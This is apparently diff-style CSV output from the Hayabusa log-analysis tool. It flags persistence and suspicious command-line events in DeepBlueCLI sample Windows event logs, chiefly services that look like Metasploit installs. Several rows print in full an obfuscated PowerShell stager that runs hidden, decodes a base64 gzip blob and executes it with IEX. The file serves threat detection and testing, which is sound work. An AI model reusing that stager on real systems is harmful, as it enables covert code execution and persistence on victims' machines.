+2016-08-19 05:10:06.597 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:11:24.391 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:12:53.344 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:14:12.922 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc94 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:16:40.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:16:40.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xad4 | User: IEUser | LID: 0x1ceaf",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:22:36.074 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:24:48.043 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x12c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x460 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
